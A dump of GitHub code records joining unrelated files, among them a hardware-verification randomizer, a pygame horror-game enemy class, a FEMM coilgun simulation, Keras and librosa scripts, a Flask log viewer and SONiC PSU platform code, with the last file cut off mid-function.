constraint_l.extend(ArrayConstraintBuilder.build(\n fm, bounds_v.bound_m))\n # Now, handle dist constraints\n DistConstraintBuilder.build(seed, fm)\n \n for c in constraint_l:\n constraint_l.extend(ArrayConstraintBuilder.build(\n c, bounds_v.bound_m))\n # Now, handle dist constraints\n DistConstraintBuilder.build(seed, c)\n\n # If we made changes during array remodeling,\n # re-run bounds checking on the updated model\n# if len(constraint_l) != constraints_len:\n bounds_v.process(field_model_l, constraint_l)\n\n if debug > 0:\n print(\"Final Model:\") \n for fm in field_model_l:\n print(\" \" + ModelPrettyPrinter.print(fm))\n for c in constraint_l:\n print(\" \" + ModelPrettyPrinter.print(c, show_exp=True))\n\n# if lint > 0:\n# LintVisitor().lint(\n# field_model_l,\n# constraint_l)\n \n\n r = Randomizer(\n solve_info=solve_info,\n debug=debug, \n lint=lint, \n solve_fail_debug=solve_fail_debug)\n# if Randomizer._rng is None:\n# Randomizer._rng = random.Random(random.randrange(sys.maxsize))\n ri = RandInfoBuilder.build(field_model_l, constraint_l, Randomizer._rng)\n \n try:\n r.randomize(ri, bounds_v.bound_m)\n finally:\n # Rollback any constraints we've replaced for arrays\n if solve_info is not None:\n solve_info.totaltime = int((time.time() - solve_info.totaltime)*1000)\n randomize_done(srcinfo, solve_info)\n for fm in field_model_l:\n ConstraintOverrideRollbackVisitor.rollback(fm)\n \n for fm in field_model_l:\n fm.post_randomize()\n \n \n # Process constraints to identify variable/constraint sets\n \n","repo_name":"antmicro/pyvsc","sub_path":"src/vsc/model/randomizer.py","file_name":"randomizer.py","file_ext":"py","file_size_in_byte":35150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"18074934424","text":"import pygame, random\nfrom abc import ABC\n\nclass Animatronic(ABC):\n def __init__(self, aggresivity:int, locationId:int, jumpscare_animation:list, rest_room:int, custom_index:int):\n \"\"\"\n locationId:\n - From 1 to 12 are room locations\n - Greater that 100 are office locations\n 101: Office hallway\n 102: Right vent\n 103: Left vent\n 104: In Office Desk\n 0: Rest after attacking\n\n \"\"\"\n\n\n self.locationId = locationId\n self.secondPositionId = 1\n self.timer = pygame.time.get_ticks()\n self.changing_position:bool = False\n self.action_error:bool = False # When the animatronic is moving\n self._previous_movement = [] # The changing and the location\n self._jumpscare:bool = False\n self.jumpscare_animation = jumpscare_animation\n self._gameOver = False\n self.occupied_camera_time = 5000\n self.inOfficeDesk:bool = False # If the animatronic is in office to attack\n self.name_id:str = \"-\"\n self._prepare_to_jumpscare = False # Get a random timer and jumpscare the player\n self.jumpscare_wait_time = random.randint(2000, 12000)\n self.time_with_mask_goal = 120\n self.time_with_mask = 0\n self.rest_room = rest_room # The room where the animatrionic rests after a screamer attempt\n self.aggresivity = aggresivity\n self._base_movement_time = 50_000\n self.vent_time_to_scare = 0\n self.movement_time = self._base_movement_time\n self.custom_index = custom_index # For custom night\n self.noise_timer = pygame.time.get_ticks()\n self.time_to_make_noise = 18_000\n\n # Aveliable animatrionics with the same room position\n self.aveliable_rooms_positions = {\n 101: [[\"FOXY\", \"WITHERED_BONNIE\"], [\"FOXY\", \"MANGLE\"], [\"TOY_FREDDY\"]],\n 10 : [[\"BALOON_BOY\", \"TOY_FREDDY\"]],\n 9 : [[\"FOXY\", \"WITHERED_FREDDY\", \"WITHERED_BONNIE\", \"WITHERED_CHICA\"]]\n }\n\n def jumpscare_update(self, App):\n if self.aggresivity != 0:\n if self._jumpscare:\n self.jumpscare_animation.update(App.surface)\n App.objects.open_monitor_button.quitting_camera = True\n App.objects.mask_button.quitting_mask = True\n if self.jumpscare_animation.sprite_num == len(self.jumpscare_animation.sprites) - 1:\n self._gameOver = True\n\n def update_movement_time(self):\n self.movement_time = self._base_movement_time\n self.movement_time -= (self.aggresivity*157)\n self.vent_time_to_scare = (self.movement_time*1.3) / (self.aggresivity + 1)\n\n def update(self, App):\n self.update_movement_time()\n if self.aggresivity != 0: \n if not self._jumpscare:\n if self._prepare_to_jumpscare:\n self.jumpscare_time(App)\n else:\n self.movement(App)\n\n # Static to camera\n if self.changing_position:\n self._change_occupied_camera_or_office(App, True)\n elif not self.changing_position and self.action_error:\n self._change_occupied_camera_or_office(App, False)\n self.action_error = False\n \n self.animatrionic_movement_sounds(App)\n\n # If in room 0\n if self.locationId == 0 and self.rest_room != None:\n self.change_location_id(App, self.rest_room)\n\n def animatrionic_movement_sounds(self, App):\n if pygame.time.get_ticks() - self.noise_timer > self.time_to_make_noise:\n if not(self.name_id == \"BALOON_BOY\" and self.name_id == \"MANGLE\"):\n if self.locationId == 5 or self.locationId == 6:\n App.assets.vents_sounds.play()\n\n elif self.changing_position:\n ran = random.randint(0, len(App.assets.walk_sounds) - 1)\n App.assets.walk_sounds[ran].play()\n elif self.name_id == \"BALOON_BOY\":\n if not self.locationId == -1:\n if self.changing_position:\n ran = random.randint(0, 3)\n if ran == 3:\n App.assets.baloon_laugh.play()\n else:\n App.assets.baloon_noises[ran].play()\n\n elif self.name_id == \"MANGLE\":\n if not self.locationId == -1 and not self.locationId == 6:\n if self.changing_position:\n App.assets.metal_run_sound.play()\n\n\n self.noise_timer = pygame.time.get_ticks()\n\n def jumpscare_time(self, App):\n if pygame.time.get_ticks() - self.timer > self.jumpscare_wait_time and App.objects.open_monitor_button.inCamera and not App.objects.office.animatronic_in_office:\n self.jumpscare(App)\n\n def _change_occupied_camera_or_office(self, App, state:bool):\n \"\"\" Change occupied camera and office \"\"\"\n # If previous_movement is below 100 its a camera\n if self._previous_movement[0] -1 < 100:\n App.objects.camera.occupied_camera[self._previous_movement[0] - 1] = state # Camera\n else:\n App.objects.office.occupied_office[self._previous_movement[0] - 101] = state # Office\n\n if self._previous_movement[1] -1 < 100:\n App.objects.camera.occupied_camera[self._previous_movement[1] - 1] = state # Camera\n else:\n App.objects.office.occupied_office[self._previous_movement[1] - 101] = state # Office\n\n def movement(self, App):\n pass\n\n def verify_free_room(self, App, room_location:int):\n animatrionics_in_room = App.objects.Animatronics.every_animatrionic_position[room_location]\n if animatrionics_in_room == []: return True\n\n if not room_location in list(self.aveliable_rooms_positions.keys()):\n for animatrionic in animatrionics_in_room:\n if animatrionic.name_id != self.name_id:\n return False\n\n return True\n else:\n found_match = False\n for animatrionic in animatrionics_in_room:\n for aveliable_pos in self.aveliable_rooms_positions[room_location]:\n found_match = False\n for name in aveliable_pos:\n print(name)\n if animatrionic.name_id == name:\n found_match = True\n else:\n break\n\n if found_match: break\n if found_match: break\n\n if found_match and self.name_id in aveliable_pos:\n return True\n return False\n\n def change_location_id(self ,App, room_location:int, secondPositionId=1, forced=False):\n changing_to_location = room_location\n changing_to_position = secondPositionId\n self._previous_movement = [changing_to_location, self.locationId, changing_to_position, self.secondPositionId]\n\n if (changing_to_location == 104 or changing_to_location == -1 or changing_to_location == 0):\n self.changing_position = True\n self._wait_movement_time(force=True)\n else:\n self._wait_movement_time()\n is_free_room = self.verify_free_room(App, room_location)\n \n \"\"\"print(f\"free-room ({self.name_id}): {is_free_room}, force: {forced}\")\n print(\"its me! it works!\")\n print(App.objects.Animatronics.every_animatrionic_position[room_location])\n print(self.aveliable_rooms_positions)\"\"\"\n \n # If it's empty or its forced\n if forced or is_free_room:\n if not self.changing_position:\n self.locationId = changing_to_location\n self.secondPositionId = changing_to_position\n changing_to_location = -1\n self.time_with_mask = 0\n else:\n # We need more time !\n self.timer = pygame.time.get_ticks()\n self.changing_position = False\n\n def _wait_movement_time(self, force=False):\n \"\"\" Will provoke the static while moving \"\"\"\n if not self.changing_position:\n self.timer = pygame.time.get_ticks()\n self.changing_position = True\n self.action_error = True\n\n elif self.changing_position:\n if not force:\n time_to_change = self.occupied_camera_time/self.aggresivity\n else:\n time_to_change = 0\n\n if pygame.time.get_ticks() - self.timer > time_to_change:\n self.changing_position = False\n self.timer = pygame.time.get_ticks()\n\n def isGameOver(self):\n return self._gameOver\n\n def get_prev_movement(self):\n if self.action_error and self.changing_position == False:\n self.prev_copy = self._previous_movement\n self._previous_movement = [-1, -1]\n self.action_error = False\n return self.prev_copy\n return [-1 , -1]\n\n def jumpscare(self, App):\n if not self._jumpscare and App.objects.Animatronics.every_animatrionic_position[104] == []:\n print(\"jump\")\n pygame.mixer.Channel(8).set_volume(1)\n pygame.mixer.Channel(8).play(App.assets.xScream1)\n self._jumpscare = True\n\n def prepare_to_jumpscare(self, App):\n self.change_location_id(App, -1, forced=True)\n self.timer = pygame.time.get_ticks()\n self._prepare_to_jumpscare = True\n\n def isBeingJumpscared(self): return self._jumpscare\n\n def return_to_rest_room(self, App):\n \"\"\" Changeing to room 0 will imediatly force the animatrionic to change to rest room \"\"\"\n self.change_location_id(App, 0, forced=True)","repo_name":"EDUATO/fnaf-in-pygame","sub_path":"files/animatronics/animatronic_base.py","file_name":"animatronic_base.py","file_ext":"py","file_size_in_byte":9857,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"37376362218","text":"import datetime\nimport femm\nimport matplotlib.pyplot as plt\nimport xlsxwriter as xl\nimport numpy as np\nimport os\n\n# TEST PARAMS --- Units in cm\n# filename = \"7mmCoil_192T_156A\"\nfilename = \"3.2mmCoil_100T_246A\"\n\ncurrent = 246\nsensorPos = 0.005\n\npos_start = -0.02 # starting position of front of projectile in meters\nmass = 0.018 # mass of projectile in Kg\n# length = 0.07 # projectile length in meters\nlength = 0.032\n\ntime_step = 1e-4 # time increments to use\ntime_stop = 5e-2 # time to stop simulation\nmaxStages = 9\n\n\n# set up FEMM stuff\nfemm.openfemm()\nfemm.opendocument('..\\\\'+ filename + \".fem\")\nfemm.mi_saveas('..\\\\'+\"temp_time.fem\")\nfemm.mi_seteditmode(\"group\")\n\n# set up data capture\nDateTime = datetime.datetime.now().strftime(\"%Y_%m_%d %H_%M\").replace('.', '-')\ndataDir = '..\\\\'+'Data\\\\TimeSweep ' + DateTime\nos.makedirs(dataDir, exist_ok=True)\nworkbook = xl.Workbook(dataDir + '\\\\' + filename + \".xlsx\")\nworksheet = workbook.add_worksheet()\n\nworksheet.write(0, 8, 'Mass [Kg]')\nworksheet.write(1, 8, mass)\n\nworksheet.write(0, 0, 'Time [s]')\nworksheet.write(0, 1, 'Stage #')\nworksheet.write(0, 2, 'Position wrt. Stage [cm]')\nworksheet.write(0, 3, 'Position [cm]')\nworksheet.write(0, 4, 'Velocity [m/s]')\nworksheet.write(0, 5, 'Acceleration [m/s^2]')\nworksheet.write(0, 6, 'Force [N]')\n\n# variable set up\ntime_list = list(np.arange(0.0, time_stop, time_step))\nz = [pos_start for i in range(len(time_list))] # position at end of timestep [m]\nz_tot = [pos_start for i in range(len(time_list))] # position at end of timestep [m]\nv = [0 for i in range(len(time_list))] # velocity at end of timestep [m/s]\na = [0 for i in range(len(time_list))] # Acceleration [m/s^2]\nf = [0 for i in range(len(time_list))] # Force in z-direction [N/Kg]\nstage = 0 # lets us pass the projectile through the coil multiple times\n\nfor i in range(1, len(time_list)): # start at 1 because initial conditions are zero and I want that to be reflected in data\n # worksheet.write(0, i + 1, str(round((iron_start + i * iron_step)*10)) + ' mm Force [N]')\n\n femm.mi_analyze()\n femm.mi_loadsolution()\n femm.mo_groupselectblock(1) # select group 1 (projectile)\n fz = femm.mo_blockintegral(19) # calculate force applied to projectile\n f[i] = fz\n\n # calculate kinematics stuffs\n a[i] = f[i]/mass\n v[i] = v[i-1] + a[i]*time_step\n z[i] = z[i-1] + v[i]*time_step\n z_tot[i] = z_tot[i-1] + v[i]*time_step\n\n if z[i] - length > -sensorPos:\n femm.mi_setcurrent('Coil', 0) # set coil current to 0 when back of projectile passes -0.5cm (light sensor location)\n if z[i] > length + sensorPos:\n # loop the projectile through identical coil\n femm.mi_setcurrent('Coil', current) # set current back to 156 A\n femm.mi_selectgroup(1)\n femm.mi_movetranslate(0, -(z[i] + sensorPos)*100)\n z[i] = -0.005\n stage += 1\n\n # move projectile forward\n femm.mi_selectgroup(1)\n femm.mi_movetranslate(0, v[i]*time_step * 100) # convert to cm\n\n worksheet.write(i, 0, round(time_list[i], 6))\n worksheet.write(i, 1, stage+1)\n worksheet.write(i, 2, round(z[i], 6))\n worksheet.write(i, 3, round(z_tot[i], 6))\n worksheet.write(i, 4, round(v[i], 6))\n worksheet.write(i, 5, round(a[i], 6))\n worksheet.write(i, 6, round(f[i], 6))\n print(\"Iteration # \" + str(i) + '\\tTime = ' + str(round(time_list[i], 6)) + '\\tz = ' + str(\n round(z[i], 6)) + '\\tv = ' + str(round(v[i], 6)) + '\\ta = ' + str(round(a[i], 6)))\n\n if stage >= maxStages:\n break\n\nplt.plot(time_list,f)\nplt.show()\nplt.plot(time_list,a)\nplt.show()\nplt.plot(time_list,v)\nplt.show()\nplt.plot(time_list,z)\nplt.show()\nfemm.closefemm()\nworkbook.close()","repo_name":"ThomasKulin/CG-490","sub_path":"FEMM Simulations/Scripting/coilgun_timeSweep.py","file_name":"coilgun_timeSweep.py","file_ext":"py","file_size_in_byte":3686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12985833635","text":"#Dataset Augmentation?\n#Keras \n#Map, flat map?, mat. In preprossing: create new dataset, randomly shuffle, flip, reducing the brightness\n\nimport tensorflow.compat.v2 as tf\nimport tensorflow_datasets as tfds\nfrom tensorflow import keras\nfrom preprocessDefinition import preprocess\nfrom functools import partial\n\ndataset, info = tfds.load(\"oxford_flowers102\", as_supervised=True, with_info=True)\ndataset_size = info.splits[\"train\"].num_examples\nclass_names = info.features[\"label\"].names\nn_classes = info.features[\"label\"].num_classes\n\nvalid_set = tfds.load('oxford_flowers102', split='validation',as_supervised=True) # 10% to 25%\ntrain_set = tfds.load('oxford_flowers102', split='train',as_supervised=True) #last 75% of train data\n\nbatch_size = 32\ntrain_set = train_set.shuffle(1000).repeat()\ntrain_set = train_set.map(partial(preprocess, randomize=True)).batch(batch_size).prefetch(1)\nvalid_set = valid_set.map(preprocess).batch(batch_size).prefetch(1)\n\nbase_model = keras.applications.xception.Xception(weights=\"imagenet\", include_top=False)\navg = keras.layers.GlobalAveragePooling2D()(base_model.output)\noutput = keras.layers.Dense(n_classes, activation=\"softmax\")(avg)\nmodel = keras.Model(inputs=base_model.input, outputs=output)\n\nfor layer in base_model.layers:\n layer.trainable = False\noptimizer = keras.optimizers.SGD(lr=0.2, momentum=0.9, decay=0.01)\nmodel.compile(loss=\"sparse_categorical_crossentropy\", optimizer=optimizer,\n metrics=[\"accuracy\"])\nhistory = model.fit(train_set,\n steps_per_epoch=int(0.75 * dataset_size / batch_size),\n validation_data=valid_set,\n validation_steps=int(0.15 * dataset_size / batch_size),\n epochs=5,\n )\n\nfor layer in base_model.layers:\n layer.trainable = True\noptimizer = keras.optimizers.SGD(learning_rate=0.01, momentum=0.9, nesterov=True, decay=0.001)\nmodel.compile(loss=\"sparse_categorical_crossentropy\", optimizer=optimizer,\n metrics=[\"accuracy\"])\ncheckpoint_cb = keras.callbacks.ModelCheckpoint(\"flowersModel.h5\", save_best_only=True)\nearly_stopping_cb = keras.callbacks.EarlyStopping(patience=10, restore_best_weights=True)\nhistory = model.fit(train_set,\n steps_per_epoch=int(0.75 * dataset_size / batch_size),\n validation_data=valid_set,\n validation_steps=int(0.15 * dataset_size / batch_size),\n epochs=40,\n callbacks=[early_stopping_cb, checkpoint_cb]\n )\n\n","repo_name":"Onlee97/ECET380","sub_path":"Assignment2-3/buildAndTrainFlowersModel.py","file_name":"buildAndTrainFlowersModel.py","file_ext":"py","file_size_in_byte":2545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29705041915","text":"import matplotlib.pyplot as plt\nfrom librosa import display\nimport librosa\nimport numpy as np\nfrom specAugment import spec_augment_tensorflow\n\n\nclass Wav_helper():\n def __init__(self, sig, sr, audio_name):\n # super(Wav_plot, self).__init__()\n self.sig = sig\n self.sr = sr\n self.audio_name = audio_name\n\n # 時域波型\n def time_wave(self):\n plt.figure()\n display.waveplot(self.sig, sr=self.sr, x_axis='time')\n plt.ylabel('Amplitude')\n plt.title(self.audio_name, fontproperties=\"Microsoft JhengHei\")\n\n # 頻域波型\n def frequence_wavform(self):\n sp = np.fft.fft(self.sig)\n ampSP = np.abs(sp)\n phaseSP = np.unwrap(np.angle(sp))\n time_step = 1. / self.sr\n freqs = np.fft.fftfreq(sp.size, time_step)\n idx = np.argsort(freqs) # from negative to positive\n title = 'frequence_wavform_' + self.audio_name\n plt.figure()\n plt.title(title)\n plt.plot(freqs[idx[len(idx) // 2:]], ampSP[idx[len(idx) // 2:]])\n plt.xlabel('Hz')\n plt.ylabel('Amplitude')\n\n #Spectrogram\n def spec(self):\n X = librosa.stft(self.sig)\n Xdb = librosa.amplitude_to_db(X, ref=1.0)\n plt.figure(figsize=(14, 5))\n librosa.display.specshow(\n Xdb,\n sr=self.sr,\n x_axis='time',\n y_axis='linear',\n cmap='jet',\n )\n plt.colorbar(format=' %+2.0f dB ') # 右邊的色度條\n title = 'spectrogram_' + self.audio_name\n plt.title(title, fontproperties=\"Microsoft JhengHei\")\n\n #MFCC Spectrogram\n def Mel_spec(self,\n augment=False,\n time_warping_para=0,\n frequency_masking_para=10,\n time_masking_para=10,\n frequency_mask_num=2,\n time_mask_num=0):\n # 取mfcc係數\n mfccs = librosa.feature.mfcc(y=self.sig, sr=self.sr, n_mfcc=22)\n fmax = self.sr / 2 #fmax跟採樣頻率有關,若fmax提高。採樣頻率也要提高,否則高頻會被切掉\n #計算mel頻譜圖參數\n melspec = librosa.feature.melspectrogram(self.sig,\n self.sr,\n n_mels=128,\n hop_length=None,\n fmax=fmax)\n title = 'Mel spectrogram_' + self.audio_name\n # 對頻譜圖進行擴增\n if augment == True:\n melspec = spec_augment_tensorflow.spec_augment(\n mel_spectrogram=melspec,\n time_warping_para=time_warping_para,\n frequency_masking_para=frequency_masking_para,\n time_masking_para=time_masking_para,\n frequency_mask_num=frequency_mask_num,\n time_mask_num=time_mask_num)\n title = 'Mel spectrogram_augmented_' + self.audio_name\n\n # 轉換為對數刻度\n logmelspec = librosa.power_to_db(np.abs(melspec))\n plt.figure(figsize=(9, 4))\n librosa.display.specshow(logmelspec,\n sr=self.sr,\n x_axis=\"time\",\n y_axis='mel',\n cmap='jet',\n fmax=fmax)\n plt.colorbar(format=' %+2.0f dB ') # 右邊的色度條\n\n plt.title(title, fontproperties=\"Microsoft JhengHei\")\n","repo_name":"Jack-Learn/Sound_features","sub_path":"wav_helper.py","file_name":"wav_helper.py","file_ext":"py","file_size_in_byte":3510,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"72501994724","text":"def almostIncreasingSequence(sequence):\n if len(sequence) == 2:\n return True\n\n d = []\n\n for i in range(1, len(sequence)):\n if sequence[i - 1] >= sequence[i]:\n d.append(i - 1)\n\n if len(d) == 0:\n return True\n\n if len(d) == 1:\n if d[0] == 0 or d[0] == len(sequence) - 2:\n return True\n if sequence[d[0] - 1] < sequence[d[0] + 1]:\n return True\n if sequence[d[0]] < sequence[d[0] + 2]:\n return True\n\n return False\n","repo_name":"kanglicheng/codefights","sub_path":"ArcadeUniverse/Intro/EdgeOfTheOcean/AlmostIncreasingSequence.py","file_name":"AlmostIncreasingSequence.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27798808391","text":"from datetime import datetime\nfrom google.appengine.ext import bulkload\nfrom google.appengine.api import datastore_types\n\nclass StatusLoader(bulkload.Loader):\n def __init__(self):\n bulkload.Loader.__init__(self, 'Status',\n [('user', datastore_types.users.User),\n ('beer', str),\n ('amount', int),\n ('status', datastore_types.Text),\n ('updated_at', lambda x: datetime.strptime(x, '%Y-%m-%d %H:%M:%S')),\n ])\n\nif __name__ == '__main__':\n bulkload.main(StatusLoader())\n\n","repo_name":"takatoshiono/ibeer","sub_path":"handlers/test/load/status.py","file_name":"status.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"69898874085","text":"import json\nfrom typing import List\n\nimport jsonschema\nimport traitlets\n\n\nclass Schema(traitlets.Any):\n \"\"\"any... but validated by a jsonschema.Validator\"\"\"\n\n _validator: jsonschema.Draft7Validator = None\n\n def __init__(self, validator, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self._validator = validator\n\n def validate(self, obj, value):\n errors: List[jsonschema.ValidationError] = list(\n self._validator.iter_errors(value)\n )\n if errors:\n msg = \"\"\n for error in errors:\n path = \"/\".join(map(str, error.path))\n msg += f\"\\n#/{path}\\n\\t{error.message}\"\n msg += f\"\\n\\t\\t{json.dumps(error.instance)[:70]}\"\n raise traitlets.TraitError(msg)\n return value\n","repo_name":"jupyrdf/ipyelk","sub_path":"src/ipyelk/trait_types.py","file_name":"trait_types.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"52"} +{"seq_id":"43181422744","text":"from flask import Flask, jsonify, render_template, request\nimport flask.json\n\nfrom messages import LogViewer\n\n\napp = Flask(__name__)\n#app.json_encoder = MessagesEncoder\n\n\n@app.route('/messages/')\ndef channel(channel):\n before_message = request.args.get('before_message')\n return flask.jsonify([m.to_json() for m in LogViewer().tail(channel, 100, before_message)])\n\n\n@app.route('/', defaults={'path':''})\n@app.route('/channel/')\ndef index(path):\n return render_template('index.html')\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"npmcdn-to-unpkg-bot/slack-logs-viewer","sub_path":"web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21259047079","text":"#############################################################################\n# Celestica\n#\n# Module contains an implementation of SONiC Platform Base API and\n# provides the PSUs status which are available in the platform\n#\n#############################################################################\n\nimport os.path\n\ntry:\n from sonic_platform_base.psu_base import PsuBase\n from sonic_platform.fan import Fan\nexcept ImportError as e:\n raise ImportError(str(e) + \"- required module not found\")\n\nFAN_E1031_SPEED_PATH = \"/sys/class/hwmon/hwmon{}/fan1_input\"\nHWMON_PATH = \"/sys/bus/i2c/devices/i2c-{0}/{0}-00{1}/hwmon\"\nFAN_MAX_RPM = 11000\nPSU_NAME_LIST = [\"PSU-R\", \"PSU-L\"]\nPSU_NUM_FAN = [1, 1]\nPSU_I2C_MAPPING = {\n 0: {\n \"num\": 13,\n \"addr\": \"5b\"\n },\n 1: {\n \"num\": 12,\n \"addr\": \"5a\"\n },\n}\n\n\nclass Psu(PsuBase):\n \"\"\"Platform-specific Psu class\"\"\"\n\n def __init__(self, psu_index):\n PsuBase.__init__(self)\n self.index = psu_index\n self.psu_path = \"/sys/devices/platform/e1031.smc/\"\n self.psu_presence = \"psu{}_prs\"\n self.psu_oper_status = \"psu{}_status\"\n self.i2c_num = PSU_I2C_MAPPING[self.index][\"num\"]\n self.i2c_addr = PSU_I2C_MAPPING[self.index][\"addr\"]\n self.hwmon_path = HWMON_PATH.format(self.i2c_num, self.i2c_addr)\n for fan_index in range(0, PSU_NUM_FAN[self.index]):\n fan = Fan(fan_index, 0, is_psu_fan=True, psu_index=self.index)\n self._fan_list.append(fan)\n PsuBase.__init__(self)\n\n def __read_txt_file(self, file_path):\n try:\n with open(file_path, 'r') as fd:\n data = fd.read()\n return data.strip()\n except IOError:\n pass\n return \"\"\n\n def __search_file_by_contain(self, directory, search_str, file_start):\n for dirpath, dirnames, files in os.walk(directory):\n for name in files:\n file_path = os.path.join(dirpath, name)\n if name.startswith(file_start) and search_str in self.__read_txt_file(file_path):\n return file_path\n return None\n\n def get_voltage(self):\n \"\"\"\n Retrieves current PSU voltage output\n Returns:\n A float number, the output voltage in volts,\n e.g. 12.1\n \"\"\"\n psu_voltage = 0.0\n voltage_name = \"in{}_input\"\n voltage_label = \"vout1\"\n\n vout_label_path = self.__search_file_by_contain(\n self.hwmon_path, voltage_label, \"in\")\n if vout_label_path:\n dir_name = os.path.dirname(vout_label_path)\n basename = os.path.basename(vout_label_path)\n in_num = ''.join(list(filter(str.isdigit, basename)))\n vout_path = os.path.join(\n dir_name, voltage_name.format(in_num))\n vout_val = self.__read_txt_file(vout_path)\n psu_voltage = float(vout_val) / 1000\n\n return psu_voltage\n\n def get_current(self):\n \"\"\"\n Retrieves present electric current supplied by PSU\n Returns:\n A float number, the electric current in amperes, e.g 15.4\n \"\"\"\n psu_current = 0.0\n current_name = \"curr{}_input\"\n current_label = \"iout1\"\n\n curr_label_path = self.__search_file_by_contain(\n self.hwmon_path, current_label, \"cur\")\n if curr_label_path:\n dir_name = os.path.dirname(curr_label_path)\n basename = os.path.basename(curr_label_path)\n cur_num = ''.join(list(filter(str.isdigit, basename)))\n cur_path = os.path.join(\n dir_name, current_name.format(cur_num))\n cur_val = self.__read_txt_file(cur_path)\n psu_current = float(cur_val) / 1000\n\n return psu_current\n\n def get_power(self):\n \"\"\"\n Retrieves current energy supplied by PSU\n Returns:\n A float number, the power in watts, e.g. 302.6\n \"\"\"\n psu_power = 0.0\n current_name = \"power{}_input\"\n current_label = \"pout1\"\n\n pw_label_path = self.__search_file_by_contain(\n self.hwmon_path, current_label, \"power\")\n if pw_label_path:\n dir_name = os.path.dirname(pw_label_path)\n basename = os.path.basename(pw_label_path)\n pw_num = ''.join(list(filter(str.isdigit, basename)))\n pw_path = os.path.join(\n dir_name, current_name.format(pw_num))\n pw_val = self.__read_txt_file(pw_path)\n psu_power = float(pw_val) / 1000000\n\n return psu_power\n\n def get_powergood_status(self):\n \"\"\"\n Retrieves the powergood status of PSU\n Returns:\n A boolean, True if PSU has stablized its output voltages and passed all\n its internal self-tests, False if not.\n \"\"\"\n return self.get_status()\n\n def set_status_led(self, color):\n \"\"\"\n Sets the state of the PSU status LED\n Args:\n color: A string representing the color with which to set the PSU status LED\n Note: Only support green and off\n Returns:\n bool: True if status LED state is set successfully, False if not\n \"\"\"\n # Hardware not supported\n return False\n\n def get_status_led(self):\n \"\"\"\n Gets the state of the PSU status LED\n Returns:\n A string, one of the predefined STATUS_LED_COLOR_* strings above\n \"\"\"\n # Hardware not supported\n return self.STATUS_LED_COLOR_OFF\n\n def get_name(self):\n \"\"\"\n Retrieves the name of the device\n Returns:\n string: The name of the device\n \"\"\"\n return PSU_NAME_LIST[self.index]\n\n def get_presence(self):\n \"\"\"\n Retrieves the presence of the PSU\n Returns:\n bool: True if PSU is present, False if not\n \"\"\"\n psu_location = [\"R\", \"L\"]\n presences_status = self.__read_txt_file(\n self.psu_path + self.psu_presence.format(psu_location[self.index])) or 0\n\n return int(presences_status) == 1\n\n def get_status(self):\n \"\"\"\n Retrieves the operational status of the device\n Returns:\n A boolean value, True if device is operating properly, False if not\n \"\"\"\n psu_location = [\"R\", \"L\"]\n power_status = self.__read_txt_file(\n self.psu_path + self.psu_oper_status.format(psu_location[self.index])) or 0\n\n return int(power_status) == 1\n","repo_name":"Marvell-OpenNOS/sonic-buildimage","sub_path":"device/celestica/x86_64-cel_e1031-r0/sonic_platform/psu.py","file_name":"psu.py","file_ext":"py","file_size_in_byte":6548,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"22276956436","text":"import math\n\nfrom PySide2.QtCore import Qt, QItemSelectionModel, QSignalBlocker\nfrom PySide2.QtWidgets import QTableWidgetItem\n\nfrom hexrd.ui.hexrd_config import HexrdConfig\nfrom hexrd.ui.ui_loader import UiLoader\n\n\nclass MaterialsTable:\n\n def __init__(self, parent=None):\n loader = UiLoader()\n self.ui = loader.load_file('materials_table.ui', parent)\n flags = self.ui.windowFlags()\n self.ui.setWindowFlags(flags | Qt.Tool)\n self.setup_connections()\n\n def setup_connections(self):\n self.ui.table.selectionModel().selectionChanged.connect(\n self.update_ring_selections)\n\n def show(self):\n if not hasattr(self, 'already_shown'):\n self.already_shown = True\n self.move_dialog_to_left()\n\n self.ui.show()\n\n def update_material_name(self):\n self.ui.setWindowTitle(HexrdConfig().active_material_name)\n\n def update_ring_selections(self):\n # This updates the exclusions based upon the table selections\n plane_data = HexrdConfig().active_material.planeData\n selection_model = self.ui.table.selectionModel()\n selected_rows = [x.row() for x in selection_model.selectedRows()]\n\n indices = range(len(plane_data.exclusions))\n exclusions = [i not in selected_rows for i in indices]\n plane_data.exclusions = exclusions\n HexrdConfig().flag_overlay_updates_for_active_material()\n HexrdConfig().overlay_config_changed.emit()\n\n def update_table_selections(self):\n # This updates the table selections based on the exclusions\n material = HexrdConfig().active_material\n selection_model = self.ui.table.selectionModel()\n blocker = QSignalBlocker(selection_model) # noqa: F841\n\n selection_model.clear()\n plane_data = material.planeData\n for i, exclude in enumerate(plane_data.exclusions):\n if exclude:\n continue\n\n # Add the row to the selections\n model_index = selection_model.model().index(i, 0)\n command = QItemSelectionModel.Select | QItemSelectionModel.Rows\n selection_model.select(model_index, command)\n\n def update_table(self):\n material = HexrdConfig().active_material\n\n block_list = [\n self.ui.table,\n self.ui.table.selectionModel()\n ]\n blockers = [QSignalBlocker(x) for x in block_list] # noqa: F841\n\n plane_data = material.planeData\n\n # For the table, we will turn off exclusions so that all\n # rows are displayed, even the excluded ones. The user\n # picks the exclusions by selecting the rows.\n previous_exclusions = plane_data.exclusions\n plane_data.exclusions = [False] * len(plane_data.exclusions)\n\n hkls = plane_data.getHKLs(asStr=True)\n d_spacings = plane_data.getPlaneSpacings()\n tth = plane_data.getTTh()\n\n # Restore the previous exclusions\n plane_data.exclusions = previous_exclusions\n\n self.ui.table.clearContents()\n self.ui.table.setRowCount(len(hkls))\n for i, 